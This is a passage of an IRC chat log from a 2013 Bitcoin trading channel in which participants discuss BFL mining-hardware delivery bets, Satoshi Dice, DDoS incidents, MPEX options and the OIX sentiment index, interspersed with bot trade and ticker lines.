0.09 per bet Mar 16 01:30:23 is there anywhere i can read how this is structured? Mar 16 01:31:17 well... the faq ? Mar 16 01:31:44 https://twitter.com/blockchain/status/311591961268215809 oh they were ddosed too? Mar 16 01:32:29 jurov yes Mar 16 01:34:05 http://trilema.com/2013/boys-and-girls-i-got-news-were-being-probed/#comment-92347 Mar 16 01:34:08 nice cloudfail. Mar 16 01:34:45 also http://polimedia.us/dtng/c/src/132126780642.jpg Mar 16 01:35:22 flat ass Mar 16 01:36:04 [BTCTC] [S.DICE-PT] 17 @ 0.00545 = 0.0927 BTC [+] Mar 16 01:36:08 http://www.telegraph.co.uk/science/large-hadron-collider/9929535/Higgs-boson-scientists-confident-they-have-discovered-the-God-particle.html Mar 16 01:36:20 basically the god particle looks like a mushroom on mushrooms. Mar 16 01:36:57 but what is the god particle made of? Mar 16 01:37:03 and who made it? Mar 16 01:38:03 satoshi obv Mar 16 01:38:31 what does god particle pay in divs? Mar 16 01:38:36 ahahah Mar 16 01:39:20 i come in here with questions and you guys just act mean Mar 16 01:39:32 :) Mar 16 01:39:54 i was hoping for something useful... like micro black holes Mar 16 01:40:10 or neutrinos exceeding speed of lights Mar 16 01:40:32 micro black holes ain't happenin'. Mar 16 01:41:09 aite, i[m out,. take care all. **** BEGIN LOGGING AT Sat Mar 16 07:02:10 2013 Mar 16 07:13:59 [MPEX] [S.MPOE] 11952 @ 0.00074519 = 8.9065 BTC [+] Mar 16 07:13:59 funny, i bet brfl would ship before april Mar 16 07:14:13 and i had bey soo many times they would fail before, starting in 2011 :) Mar 16 07:14:43 then if they will be shipping.. then why are bfl victims not betting ? Mar 16 07:15:07 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Mar 16 07:15:12 Bowjob by now out of monyz ? Mar 16 07:15:14 cuz bfl has all their money Mar 16 07:15:19 lol Mar 16 07:15:22 :) Mar 16 07:15:25 lol Mar 16 07:15:38 thats stupid.. u should not go balls deep Mar 16 07:16:01 balls deep is the only way i play. Mar 16 07:16:07 but srsly : the dwindling of bets (especially hedging bets) is clear indication that BFL is about to go bust. Mar 16 07:16:09 but who ever trusted bfl lulz Mar 16 07:16:22 ie, there is no more btc available to finance them. Mar 16 07:16:33 i think bfl will shit this month or next Mar 16 07:16:43 id be pissed off if they increase the TH to 800 Mar 16 07:16:46 Chaang-Noi that's what the bet volumes would seem to indicate. Mar 16 07:16:47 without my avalon Mar 16 07:16:47 lol Mar 16 07:16:49 then ill be sad Mar 16 07:16:50 however i think it will take a while to get their 5000 ships out Mar 16 07:17:05 no, not ship. shit. Mar 16 07:17:09 as in, go meet the pirate. Mar 16 07:17:45 5000 chips is only like 30th right? asicminer with 60 will still rape Mar 16 07:18:06 wow im 10% of the yes money on that bet, and i got in on the first day Mar 16 07:18:46 weight at 97k i like these odds :) Mar 16 07:19:18 however if the specs are 11% better im still going to lose even if they ship Mar 16 07:19:19 crazy Mar 16 07:19:49 better yet they dont ship Mar 16 07:19:54 lol Mar 16 07:20:05 oh well, its 5 btc Mar 16 07:20:11 either way Mar 16 07:20:33 i dont get this bet Mar 16 07:20:34 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ Mar 16 07:20:36 lol Mar 16 07:20:36 wtf Mar 16 07:21:13 "Devices must be in scope of at least -10% of advertised performance in order to be accepted as valid" Mar 16 07:21:33 its a trap Mar 16 07:21:33 lol Mar 16 07:22:51 oh nvm, at least -10% so if they ship at their expected specs then its a win Mar 16 07:22:52 mhm Mar 16 07:23:00 :) Mar 16 07:23:08 i just sent a quarter on yes on that Mar 16 07:23:18 ya they should get it within the widest imaginable industrial standards. Mar 16 07:23:26 BFL probably did make an effort at actually producing something but had major cost overruns and bad management of supply chain Mar 16 07:23:48 now they are hoping to get anything out just to get new orders in to obtain the $$ to fill old ones Mar 16 07:24:02 like avalon did Mar 16 07:24:16 pure ponzi schemes Mar 16 07:25:08 tiberiusiv you kinda had it. Mar 16 07:25:14 most scams in btc play out the same way. Mar 16 07:25:27 tom's basic thing is exactly there. bitcoinica failed the exact same way. everything in the drama timeline Mar 16 07:25:38 is a story of people trying, failing and then going eh what the fuck, we can't admit we've been idiots. Mar 16 07:25:42 so let's pretend a little longer. Mar 16 07:25:48 0 integrity Mar 16 07:26:01 and then tehy have the cheek to even talk to my girl in the forum, Mar 16 07:26:10 let alone make judgement calls and give opinions. Mar 16 07:26:24 what girl Mar 16 07:26:34 mpoe-pr? Mar 16 07:26:41 yes. Mar 16 07:26:48 i thought that was you Mar 16 07:27:13 nah. Mar 16 07:27:14 [MPEX] [S.MPOE] 6066 @ 0.00074519 = 4.5203 BTC [+] Mar 16 07:29:43 i should get a pr girl, lulz Mar 16 07:29:53 better get a business first. Mar 16 07:30:00 going afk, see ya gents later Mar 16 07:30:12 i thought roger ver and memory dealers were suppose to be intelligent Mar 16 07:30:20 goats trolling consulting :) Mar 16 07:30:35 how did they make deals to sell 800k+ of merchandise on a none existant store Mar 16 07:31:18 tiberiusiv how you mea ? Mar 16 07:31:30 bitcoinstore.com Mar 16 07:31:56 his site was running only in the last 2 weeks but he needs to sell 800k+ to keep the competitive pricing Mar 16 07:33:07 problem with that concept is his customer base is so small, basically people who derive a bitcoin income Mar 16 07:33:15 bitcoinstore is iirc online since 2012 Mar 16 07:33:16 neh / Mar 16 07:33:31 how did you compute the 800k value ? Mar 16 07:33:41 he has it listed on the site Mar 16 07:33:47 that he has to reach 850k in sales by march 31st Mar 16 07:33:55 or else he loses the pricing advantage Mar 16 07:34:15 guy turned it into a charity asking the community to support the store lol Mar 16 07:35:50 mircea: heres the problem with the bitcoinstore, if someone has to convert fiat into BTC to shop on the store, the slippage kills any pricing power over amazon Mar 16 07:36:09 [MPEX] [S.MPOE] 1804 @ 0.00074519 = 1.3443 BTC [+] Mar 16 07:36:10 [MPEX] [S.MPOE] 10265 @ 0.00074586 = 7.6563 BTC [+] Mar 16 07:36:12 mircea: so really the store only benefits those that derive bitcoin incomes, which is a tiny % of people Mar 16 07:37:56 ;;ticker Mar 16 07:37:57 BTCUSD ticker | Best bid: 46.47001, Best ask: 46.83966, Bid-ask spread: 0.36965, Last trade: 46.83966, 24 hour volume: 19691.27912928, 24 hour low: 46.40000, 24 hour high: 47.44999, 24 hour vwap: 46.95610 Mar 16 07:38:01 dat spread Mar 16 07:40:43 [MPEX] [S.MPOE] 9982 @ 0.00074314 = 7.418 BTC [-] Mar 16 07:45:41 tiberiusiv that is a point. Mar 16 07:47:25 so what happens to the havelock funds that preordered basic/bfl? Mar 16 07:48:35 ittl go down the drain Mar 16 07:49:02 or they start pre ordering from avalon batch 3 Mar 16 07:51:37 [MPEX] [S.MPOE] 16040 @ 0.00074314 = 11.92 BTC [-] Mar 16 07:51:39 [MPEX] [S.MPOE] 10222 @ 0.00073669 = 7.5304 BTC [-] Mar 16 07:53:52 tiberiusiv i have no idea. Mar 16 07:57:44 tiberiusiv: basic is gone. done Mar 16 07:58:09 only some funds have been returned, not all Mar 16 07:58:51 but as Bowjob said, they have lost alot of expected value Mar 16 08:01:53 [MPEX] [S.MPOE] 5948 @ 0.00072233 = 4.2964 BTC [-] Mar 16 08:09:08 ;;ticker Mar 16 08:09:09 BTCUSD ticker | Best bid: 46.41201, Best ask: 46.42000, Bid-ask spread: 0.00799, Last trade: 46.42000, 24 hour volume: 19533.70116065, 24 hour low: 46.40000, 24 hour high: 47.44999, 24 hour vwap: 46.95153 Mar 16 08:09:57 umm... crash? Mar 16 08:13:29 Namworld http://trilema.com/2013/the-bitchslapping-of-2013/ Mar 16 08:13:32 perhaps of interest to you. Mar 16 08:23:15 people attack satoshi dice because it is successful Mar 16 08:24:38 [MPEX] [S.MPOE] 30515 @ 0.00072639 = 22.1658 BTC [+] Mar 16 08:25:36 that was a great article mircea Mar 16 08:27:32 [MPEX] [S.MPOE] 5797 @ 0.00072639 = 4.2109 BTC [+] Mar 16 08:32:31 Quite interesting, but I'm not sure about the part where they fear you vs hate like for SD. Mar 16 08:33:07 I thought it was mostly like SD, hate. Because of what you do, not having a slice of the pie, whatever. And trolls aplenty. Mar 16 08:36:19 People attack satoshi dice because its basically kicking a baby. Mar 16 08:36:45 see: "Because of what you do" Mar 16 08:37:06 In SD's case, blockchain transactions Mar 16 08:37:34 personally I like SD Mar 16 08:38:15 dont people thing btc is going to have a LOT more tx than that come a few years time Mar 16 08:38:17 [BTCTC] [ASICMINER-PT] 2 @ 0.849 = 1.698 BTC [+] Mar 16 08:38:29 It will... Mar 16 08:38:36 and sd pays a shitload of fees as well Mar 16 08:39:11 and if pools are going to start bullshit rules of not wanting to talk to others then miners need to move Mar 16 08:44:47 echo.. echo.. echo.. Mar 16 08:45:47 Namworld perhaps. i doubt it tho. Mar 16 08:46:01 who ever heard of proponents of a system being upset cause it's actually useful for something. Mar 16 08:46:18 zerokwel in fact sd paid a little over 50% of all fees ever paid. Mar 16 08:46:54 but yah that's what i was explainingto luke and co back in feb : if they exclude sd txs that doesn't exclude sd from bitcoin, it excludes them from mining. Mar 16 08:47:17 obviously the point was undestood even if they're too spineless to admit this, or else we wouldn't have seen the move to the rabble rousing populist forum bs. Mar 16 08:47:40 first, upset isn't the word for it; second, that's not why they're advocating against it. Mar 16 08:48:02 midnightmagic listen, post an article on the topic somewhere. i'll read it Mar 16 08:48:06 and prolly comment on it. Mar 16 08:48:18 irc is not too good a medium for this discussion, it'll just get fragmented into nonsense. Mar 16 08:48:27 that's very true. Mar 16 08:48:43 I just don't see you handling punishments or people showing fear... I'm not sure what that fear part is about. Mar 16 08:48:53 very well, i agree. i'll stop.. Mar 16 08:48:55 handing* Mar 16 08:51:07 so by using the above reasoning if we beleve that a pool blocking SD tx is a bad thing. then stoping that pool from working would be the same example Mar 16 08:51:20 meh... total bs if u ask me Mar 16 08:51:34 SD is not an issue Mar 16 08:53:10 so for exaple if everyone blocked the pools ip that was not helping the network. same result :) Mar 16 08:53:47 zerokwel moreover this is a serious problem for the future. Mar 16 08:54:07 suppose china comes to avalon or asicminer and says you must not rely the tx of this charity Mar 16 08:54:12 because its from tibet. Mar 16 08:54:20 technically it works by miners vote. Forks can be created. Users can as well follow forks according to what they want... Mar 16 08:54:50 i won't be speaking for some charity in tibet because i don't give a shit. if people actually do this sort of crap then btc will be fucked on the longer term Mar 16 08:54:51 If they don't simply follow the longest chain... Mar 16 08:55:15 good point MP Mar 16 08:55:20 Namworld the problem here is that since we don't have multiple implementations, the behaviour of clients is centralised not by their will Mar 16 08:55:26 but by predictable code accident Mar 16 08:56:20 [MPEX] [S.MPOE] 5526 @ 0.00072639 = 4.014 BTC [+] Mar 16 08:56:22 [MPEX] [S.MPOE] 4950 @ 0.00072743 = 3.6008 BTC [+] Mar 16 08:56:22 [MPEX] [S.MPOE] 21224 @ 0.00073381 = 15.5744 BTC [+] Mar 16 09:00:03 [MPEX] [S.MPOE] 2935 @ 0.00072233 = 2.12 BTC [-] Mar 16 09:00:56 https://bitcointalk.org/index.php?topic=153604.0 Mar 16 09:01:00 good deal imo Mar 16 09:01:14 [MPEX] [O.BTCUSD.C350T] 916 @ 0.25321359 = 231.9436 BTC [+] Mar 16 09:01:31 Hopefully that issue will be solved. Mar 16 09:01:45 [MPEX] [S.MPOE] 40545 @ 0.00073381 = 29.7523 BTC [+] Mar 16 09:01:56 Bowjob wjhat ?! he's selling them for 1 ?! Mar 16 09:02:09 only 1 coin is for sale at 1 Mar 16 09:02:17 so it goes up in price as they get sold ala bitbet Mar 16 09:02:18 o like a giveaway yeah Mar 16 09:02:27 So I got one for 1.05 Mar 16 09:02:28 kinda neat idea actually Mar 16 09:03:15 molec / moleccc hey you here ? Mar 16 09:03:37 yep Mar 16 09:03:53 I'm taking 3 for the heck of it. Mar 16 09:04:05 ah, you guys found my thread ;) Mar 16 09:04:06 lol Mar 16 09:04:13 go ahead, still cheap ;) Mar 16 09:04:27 cool idea hehe. Mar 16 09:04:54 i'm not gonna weigh your bottom line down, i can get as many coins as i want for myself, but nice way to spread the love. Mar 16 09:05:56 now this sucks, my wallet says 199 Mar 16 09:06:00 as opposed to 200 Mar 16 09:06:01 lol Mar 16 09:06:03 mircea_popescu, thanks Mar 16 09:06:20 Can I pay on monday? I'm expecting a payment then. I don't want to get all my bids on exchange shifted around. Mar 16 09:06:31 Namworld take a loan :D Mar 16 09:06:43 Namworld, this is exactly what I was hoping for: people buying more than 1 ;) Mar 16 09:06:50 Not worth the trouble. Mar 16 09:06:54 Namworld, still a very good price Mar 16 09:07:40 what? Mar 16 09:10:34 i take it molec will ship before BFL Mar 16 09:10:48 ok so here's a story : Mar 16 09:10:52 bflwebsite went down Mar 16 09:10:58 coinabul was hosted in the same place Mar 16 09:11:03 entire datacenter got blown. sound familiar ? Mar 16 09:12:00 yeah... you... or our switzerland node. Mar 16 09:12:33 http://anonymouse.org/cgi-bin/anon-www.cgi/http://trilema.com/2013/boys-and-girls-i-got-news-were-being-probed/ Mar 16 09:14:36 havelock never got ddosed so far Mar 16 09:16:14 that's good. Mar 16 09:16:22 neither has bitfunder or btct.co or a lot of bitcoin businesses... Mar 16 09:16:22 still, prolly time to start hardening. Mar 16 09:16:23 Namworld, you can pay on monday Mar 16 09:16:41 good Mar 16 09:19:20 seriously tho, who is handling gift certs these days ? Mar 16 09:19:50 [MPEX] [S.DICE] 7224 @ 0.0055 = 39.732 BTC [-] Mar 16 09:22:45 [MPEX] [S.DICE] 3840 @ 0.00520001 = 19.968 BTC [-] Mar 16 09:22:47 [MPEX] [S.DICE] 500 @ 0.0052 = 2.6 BTC [-] Mar 16 09:22:48 [MPEX] [S.DICE] 3800 @ 0.005 = 19 BTC [-] Mar 16 09:22:56 [MPEX] [S.DICE] 1860 @ 0.005 = 9.3 BTC [-] Mar 16 09:22:58 [MPEX] [O.BTCUSD.C370T] 882 @ 0.21019932 = 185.3958 BTC [+] Mar 16 09:22:58 mhm Mar 16 09:23:03 dice not looking too good? Mar 16 09:23:16 Looks fine to me Mar 16 09:23:21 i was just about to say hm, the calls covering, are we in for a drop ? Mar 16 09:24:34 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.17628823 = 176.2882 BTC [-] Mar 16 09:24:50 I'm thinking the latest grow might be exaggerated... I still consider the ideal value per BTC to be around 16-18 USD/BTC (and raising). But I'm not sure if the current price is warranted. Mar 16 09:25:32 Someone might just be in need of the funds however. Mar 16 09:25:42 the run-up was pretty much driven by everyone's wish on both sides of the divide to merge btc and some finance. Mar 16 09:25:48 it may have failed on this attempt Mar 16 09:26:22 it was a tough sell, the events of the 12th were the kiss of death. Mar 16 09:26:28 [MPEX] [S.MPOE] 2000 @ 0.00072946 = 1.4589 BTC [-] Mar 16 09:26:28 [MPEX] [S.MPOE] 7679 @ 0.00072233 = 5.5468 BTC [-] Mar 16 09:26:34 [MPEX] [S.MPOE] 4521 @ 0.00072214 = 3.2648 BTC [-] Mar 16 09:26:54 Namworld, I quoted wrong price. It's only 3.70 Mar 16 09:26:58 [MPEX] [S.DICE] 15779 @ 0.005 = 78.895 BTC [-] Mar 16 09:27:46 !ticker m s.dice Mar 16 09:27:48 [MPEX:S.DICE] 1D: 0.005 / 0.00518591 / 0.0058822 (36479 shares, 189.18 BTC), 7D: 0.005 / 0.00552024 / 0.006 (87093 shares, 480.77 BTC), 30D: 0.00300001 / 0.00612245 / 0.0069 (2394243 shares, 14,658.65 BTC) Mar 16 09:30:29 mircea_popescu: what events? Mar 16 09:31:00 Well reddit's BTC acceptance seems to be failing too. I think many newcomers/investors/older bitcoiners were buying on the premise of more merchants accepting Bitcoins. But if the userbase only grows by speculators/accepting merchants, it's not really working out. We need people spending those BTC. And it's not going to happen merely because merchants now accept BTC. Merchants can accept Mar 16 09:31:01 western union, people will still mostly use Paypal when available. Taking the time to get Bitcoin is an extra step which is not required. Growth comes from people adopting Bitcoins out of the need to use them of for their property as money and actually getting implicated to actual do as much transactions they need to do in Bitcoins if available. Mar 16 09:31:28 Anduck the fork Mar 16 09:31:41 ahh Mar 16 09:31:42 Okay, merchants now accept BTC, but what's the point without the spending userbase and just speculators buying up on the next big thing? Mar 16 09:31:49 Namworld this is very true. Mar 16 09:32:05 the entire "merchants accept btc" stuff is nonsense, and in general retail is pretty much irrelevanty Mar 16 09:32:08 not everyone is going to hold for over 5 years tho Mar 16 09:32:09 i been sayin' this for months Mar 16 09:32:25 The genuine userbase is growing slower. And the Bitcoin software ain't ready either. Mar 16 09:32:28 isnt this what freicoin is trying to fix Mar 16 09:32:30 well Mar 16 09:32:32 with the demmurage fee Mar 16 09:32:37 The current price is very interesting to most holders... Mar 16 09:32:47 bitcoinstore got sold over 100k usd worth of stuff in pretty small time Mar 16 09:32:55 lots of peeps will cash out at 100 Mar 16 09:33:24 theres no point in cashing out if people will accept btc as payment Mar 16 09:33:29 "Hello guys, I am a psychologist in training and I would like to offer my knowledge, insight and experience with understanding women." Mar 16 09:33:33 lol that forum. Mar 16 09:33:43 I'm expecting a sharp correction to somewhere like the steady growth throughout 2012 would have us at. Mar 16 09:33:48 if 99% of people that have bitcoin said "okey we're all holding till it hits $1000" well then could be a prob Mar 16 09:33:49 might as well just pay in btc, that way, you dont hurt the sell value Mar 16 09:33:52 but not everyone is gon do that Mar 16 09:34:09 not $1000, 10000 Mar 16 09:34:11 heh Mar 16 09:34:45 bitcoinstore was a good way to cash out BTC usefully. Probably done by the existing userbase who now had an opportunity at last to put their coins to good use. What's the point now that they're filled up on electronics they need if there's not more users to keep buying? Mar 16 09:35:05 Reddit had massive BTC sales initially. Then it lowered and lowered to peanuts. Mar 16 09:36:06 for some values of "massive" under 100 btc or so. Mar 16 09:36:10 that ain't massive nam. Mar 16 09:36:31 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.17626382 = 176.2638 BTC [-] Mar 16 09:36:32 In proportion to their sales Mar 16 09:36:39 ;;ticker Mar 16 09:36:40 BTCUSD ticker | Best bid: 46.50000, Best ask: 46.61000, Bid-ask spread: 0.11000, Last trade: 46.61000, 24 hour volume: 19651.52807249, 24 hour low: 46.27070, 24 hour high: 47.44999, 24 hour vwap: 46.91393 Mar 16 09:36:47 [MPEX] [S.MPOE] 7518 @ 0.00072214 = 5.429 BTC [-] Mar 16 09:36:58 [MPEX] [S.MPOE] 5385 @ 0.00071976 = 3.8759 BTC [-] Mar 16 09:37:02 Something close to 10% of sales. A good amount considering it's BTC and the low usage among the general population. Mar 16 09:38:25 Either way, I don't believe there's enough of a genuine userbase growth to sustain those prices. Mar 16 09:38:52 and too many fucks up to come ahead to get major capital invested in the near future. Mar 16 09:39:25 https://www.bitcoinstore.com/ Mar 16 09:39:30 17% Mar 16 09:39:42 not as bad as you think, but pretty bad Mar 16 09:39:55 i'd say it's decent Mar 16 09:40:04 [MPEX] [S.MPOE] 87 @ 0.00073381 = 0.0638 BTC [+] Mar 16 09:40:08 ive not even seen bitcoinstore ads anywhere Mar 16 09:40:15 still theyve sold pretty much Mar 16 09:40:26 id actually use it.. but then again Mar 16 09:40:33 i already have a beast of a computer Mar 16 09:40:43 +1 for multiple implementations. It is in fact something that Satoshi hoped would happen much earlier than where we are in bitcoin adoption. Mar 16 09:41:10 Yeah, but at the price of electronics, 1 user could easily fit 1k USD on average. That's like 100 - 500 buyers total. Mar 16 09:41:20 Talk about a customer base... Mar 16 09:41:42 Namworld: Is it possible to withdraw BTC *from* reddit? Mar 16 09:41:59 like convert back from gold or whatever it is you can buy on reddit Mar 16 09:42:33 midnightmagic wwithout having talked to the man, it is my impression he basically wrote a spec and then hacked together a mcguyver implementation he didn't think much of Mar 16 09:42:45 Reddit thing is about premium subscriptions sales. I don't know of many premium subscription service which allows to cash out said subscription... Mar 16 09:42:46 in terms of, fuck it, it's not supposed to work long term, it's stupposed to show how this could work Mar 16 09:43:29 I thought so at first. But then it's been my experience since then that each strange decision ended up having long-reaching, and resilience-related consequences for the distant future. Mar 16 09:43:50 and here it is with a market cap over 500 million USD... Mar 16 09:44:22 imo that market cap number is bullshit Mar 16 09:44:28 It was supposed to just be a reference implementation, never The Real one. Even Gavin has made many and numerous noises about how much better off bitcoin would be with multiple implementations. Mar 16 09:44:39 you cant find someone willing to pay 500m for 10.8m BTCs Mar 16 09:44:47 im not saying it's impossible to move the actual implementation as it is into shape by incremental improvements ftr. Mar 16 09:44:58 instead as you sell BTC, it becomes cheaper Mar 16 09:45:38 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.17623687 = 176.2369 BTC [-] Mar 16 09:45:41 that's not really the point but yeah. Mar 16 09:45:48 Anyway, almost 4 am... I think I'll be heading off. Mar 16 09:45:58 MPEX] [O.BTCUSD.C390T] 1000 @ 0.17623687 = 176.2369 BTC Mar 16 09:46:00 what does this mean? Mar 16 09:46:06 I think a strong, with-the-devs-onboard alternate implementation to create client heterogeny would probably be a welcome relief for most of them. Mar 16 09:46:14 heh calls are covering. either they're right and a top is in Mar 16 09:46:17 or else they're wrong. Mar 16 09:46:22 If BTC reaches 39 dollars, this dude gets money? Mar 16 09:46:34 And by "with the devs onboard" I just mean cooperation and expertise transfer. Mar 16 09:46:46 Bowjob nah it was sold. he had bought it earlier for w/e Mar 16 09:46:53 [MPEX] [S.MPOE] 16250 @ 0.00073492 = 11.9425 BTC [+] Mar 16 09:46:57 oh Mar 16 09:47:03 just taking profits then Mar 16 09:47:11 No, it might have been bought earlier for cheaper. It's a C for call, so yeah, taking profits. Mar 16 09:47:11 prolly made some profit Mar 16 09:47:20 hmma Mar 16 09:47:25 It's pretty stressful for them, the abuse. It's actually the reason why Satoshi left. Did you know that? Mar 16 09:47:25 asicminer@0.84 Mar 16 09:47:28 sick price imo Mar 16 09:47:31 midnightmagic yes. Mar 16 09:47:32 yeah Mar 16 09:47:49 the solution is quite simple : don't get politically involved. stick to writing code. Mar 16 09:47:56 I thought Satoshi had "better things to do" Mar 16 09:48:00 Night all. Mar 16 09:48:02 Bowjob that's what it's called Mar 16 09:48:05 night Namworld Mar 16 09:48:59 Bowjob: No. He didn't want to be involved in all the conflict. People kept coming in and insisting the code was shit. Except people like Hal Finney.. but they were so rare that they were drowned out in the noise. And then people were suggesting too early that wikileaks start using it and and and.. :) Mar 16 09:49:00 bowjob: market caps tend to be BS in the real world, they are based off of the last sale irrelevant of volume Mar 16 09:49:41 bowjob: market caps should be used to determine value, its better then price Mar 16 09:49:48 tiberiusiv that's why i regularly use the 30day price figures for mkt cap, and the 24 hour averages for btc prices on option pricing and so forth. Mar 16 09:49:57 hoping people get used to the approach Mar 16 09:50:18 ;;ticker Mar 16 09:50:18 BTCUSD ticker | Best bid: 46.50001, Best ask: 46.64899, Bid-ask spread: 0.14898, Last trade: 46.50001, 24 hour volume: 19605.08858072, 24 hour low: 46.27070, 24 hour high: 47.44999, 24 hour vwap: 46.91298 Mar 16 09:50:30 yawn, we've been declining today Mar 16 09:50:40 the volume sucks though Mar 16 09:50:53 declines on low volume are positive Mar 16 09:50:54 you know in spite of the spikes avg volume is like 20-30k Mar 16 09:51:12 which is very low compared to the 10.8 mil coins Mar 16 09:51:17 nah. Mar 16 09:51:30 we're actually less thatn 10.8m Mar 16 09:51:39 a lot of coins were lost Mar 16 09:51:42 bitcoin is mostly used as a store of value anyway Mar 16 09:52:26 i feel that fuckup on the twelth kinda killed the rally Mar 16 09:54:04 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.17620987 = 176.2099 BTC [-] Mar 16 09:54:29 lots of profits Mar 16 09:54:30 mhm Mar 16 09:55:47 [MPEX] [O.BTCUSD.C350T] 230 @ 0.25305341 = 58.2023 BTC [-] Mar 16 09:57:26 $vwap S.DICE Mar 16 09:57:27 FabianB: {u'7d': {u'cnt': u'54', u'min': u'500000', u'max': u'600000', u'vsa': u'48077439398', u'vsh': u'87093', u'avg': u'552024.151172'}, u'30d': {u'cnt': u'538', u'min': u'300001', u'max': u'690000', u'vsa': u'1465865095496', u'vsh': u'2394243', u'avg': u'612245.74761'}, u'1d': {u'cnt': u'9', u'min': u'500000', u'max': u'588220', u'vsa': u'18917716557', u'vsh': u'36479', u'avg': (1 more message) Mar 16 09:58:25 !ticker m s.dice Mar 16 09:58:26 [MPEX:S.DICE] 1D: 0.005 / 0.00518591 / 0.0058822 (36479 shares, 189.18 BTC), 7D: 0.005 / 0.00552024 / 0.006 (87093 shares, 480.77 BTC), 30D: 0.00300001 / 0.00612245 / 0.0069 (2394243 shares, 14,658.65 BTC) Mar 16 09:58:47 way cleanner imo. mpexbot more adequate for programming i'd guess Mar 16 09:59:20 yeah, if it wouldn't at the end say "(1 more message)" ;) Mar 16 09:59:55 does it do that in pm too ? Mar 16 10:00:33 [MPEX] [S.MPOE] 2807 @ 0.00073493 = 2.0629 BTC [+] Mar 16 10:00:34 didn't get pm, but i'm umode +R Mar 16 10:00:34 [MPEX] [S.MPOE] 15513 @ 0.00073492 = 11.4008 BTC [-] Mar 16 10:00:42 let me turn that off for a moment Mar 16 10:00:49 bah it does Mar 16 10:00:57 $vwap s.dice Mar 16 10:00:58 FabianB: {u'7d': {u'cnt': u'54', u'min': u'500000', u'max': u'600000', u'vsa': u'48077439398', u'vsh': u'87093', u'avg': u'552024.151172'}, u'30d': {u'cnt': u'538', u'min': u'300001', u'max': u'690000', u'vsa': u'1465865095496', u'vsh': u'2394243', u'avg': u'612245.74761'}, u'1d': {u'cnt': u'9', u'min': u'500000', u'max': u'588220', u'vsa': u'18917716557', u'vsh': u'36479', u'avg': (1 more message) Mar 16 10:01:20 smickles, could $vwap be cleaned up a little so that the 1 more msg thing is not printed ? perhaps take out all the u too Mar 16 10:01:42 and all the spaces, no need Mar 16 10:02:10 yeah, i guess it's just a few characters needed for the 1d avg Mar 16 10:11:55 Anybody can explain the mpex oix in laymens terms? Mar 16 10:12:14 (I've read the blog article - still confused) Mar 16 10:17:50 [MPEX] [S.MPOE] 10000 @ 0.00071977 = 7.1977 BTC [-] Mar 16 10:17:51 [MPEX] [S.MPOE] 3365 @ 0.00071976 = 2.422 BTC [-] Mar 16 10:17:53 [MPEX] [S.MPOE] 3300 @ 0.00071873 = 2.3718 BTC [-] Mar 16 10:17:54 [MPEX] [S.MPOE] 5885 @ 0.00071641 = 4.2161 BTC [-] Mar 16 10:21:55 [BTCTC] [PAJKA.BOND] 1 @ 0.10499 BTC [+] Mar 16 10:22:01 Guest7560 basically it's a sentiment indicator Mar 16 10:22:13 it sums up what the option traders think the price will be next week Mar 16 10:23:21 so the traders think BTC will go down to 39.31 Mar 16 10:23:32 mircea_popescu: Thanks! So 39.31 (57.59 / 37.62) means sentiment is that it's going down Mar 16 10:23:52 What do the 2nd and 3rd values mean? Mar 16 10:23:55 on average, they expect 39.31 next week. the call side expects 57.59, the put side 37.32 Mar 16 10:24:12 That's pretty broad... Mar 16 10:24:14 it allows for easy separation between bulls and bears by taking advantage of the the nature of options Mar 16 10:24:23 so some expect 57 by next week Mar 16 10:24:28 bow yes. Mar 16 10:24:41 also consider 2nd line : 4`851.15 (8.5 / 91.5) Mar 16 10:24:56 of the ~5k btc on the line, only 8.5% belongs to the people expecting 57.59 Mar 16 10:25:08 so they aren;t really putting their btc where their mouth is very much Mar 16 10:25:33 Aha! Mar 16 10:25:44 it's a pretty sophisticated measure, if you think about it Mar 16 10:25:44 mircea_popescu: Cool, thanks! Mar 16 10:25:56 however, i wouldn't fall in love with it. we don't know yet if it makes any sense or just is a pretty number Mar 16 10:26:25 I think I've read on reddit somewhere that it never failed in the past..? Mar 16 10:26:29 I just missed something interesting. Mar 16 10:26:38 it predicted some events in the past and failed to rpedict others Mar 16 10:26:47 you put on feb 28th Mar 16 10:26:49 there's a graph in the article on trilema showing it against the actual price Mar 16 10:28:10 That's the one I think yes Mar 16 10:28:55 http://trilema.com/wp-content/uploads/2013/02/oix-retrospective.png Mar 16 10:29:02 That means the OIX is pretty accurate Mar 16 10:29:19 So while mpex site was down the last couple days (ddos I think), I heard that trading was still going in irc Mar 16 10:29:24 I don't understand that huge red sword Mar 16 10:29:31 in the middle. wtf is that Mar 16 10:29:48 did people suddenly expect BTC to raise to the moon? Mar 16 10:29:48 wat Mar 16 10:29:53 Is there a way to get the oix when mpex.co website is down? Mar 16 10:30:14 Bowjob you can buy a very expensive call and make the sentiment spike on low volume, i think is what happened. Mar 16 10:30:23 Guest43913 yes. looky : Mar 16 10:30:24 ah Mar 16 10:30:27 !ticker m ^oix Mar 16 10:30:28 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 37.62123733 / 39.31406066 / 57.58756229 (28662 shares, 4,851.15 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 16 10:31:15 Bowjob for instance consider O.BTCUSD.C750T. it costs like .05 btc. if you buy it, you imply price goes to like 76+ Mar 16 10:31:23 if that's the only thing that's bought... spike. Mar 16 10:31:47 yeah i see it Mar 16 10:32:02 Ah cool! Mar 16 10:32:08 option trade volume varies A LOT. two weeks ago was 20k Mar 16 10:32:11 now it's 4k etc. Mar 16 10:32:13 Thanks, mircea_popescu Mar 16 10:32:16 there's periods with 0 trade. so... Mar 16 10:32:19 Guest7560 np Mar 16 10:32:36 what are the green lines for? Mar 16 10:32:45 Guest7560 http://trilema.com/2013/the-many-ways-available-for-talking-to-mpex/ Mar 16 10:32:51 you can get more details about the bots etc there. Mar 16 10:32:52 [MPEX] [S.MPOE] 13111 @ 0.00071641 = 9.3929 BTC [-] Mar 16 10:32:54 [MPEX] [S.MPOE] 20307 @ 0.00071488 = 14.5171 BTC [-] Mar 16 10:32:55 [BTCTC] [ASICMINER-PT] 20 @ 0.849 = 16.98 BTC [+] Mar 16 10:33:14 Bowjob you mean on the right sidhe ? Mar 16 10:33:23 yeap Mar 16 10:33:46 [BTCTC] [ASICMINER-PT] 20 @ 0.849 = 